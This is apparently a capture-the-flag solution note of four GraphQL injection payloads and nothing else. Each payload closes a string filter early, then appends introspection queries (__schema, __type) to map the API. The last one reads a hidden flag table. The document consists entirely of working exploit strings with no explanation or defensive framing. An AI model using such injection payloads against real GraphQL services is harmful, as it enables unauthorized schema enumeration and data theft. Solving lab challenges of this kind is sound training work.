----------------------- JUSTE ---------------
```
a%"}}]}){ nodes { firstname, lastname, speciality, price }}__schema{types{name}}}#
```
```
a%"}}]}){ nodes { firstname, lastname, speciality, price }} __type(name:"FlagNotTheSameTableName") {fields {name}}}#
```
```
a%"}}]}){ nodes { firstname, lastname, speciality, price }} __type (name: "Query") {name fields{name type{name kind ofType{name kind}}}}}#
```
```
a%"}}]}){ nodes { firstname, lastname, speciality, price }} allFlagNotTheSameTableNames { nodes { flagNotTheSameFieldName }}}#
```
--------------------------	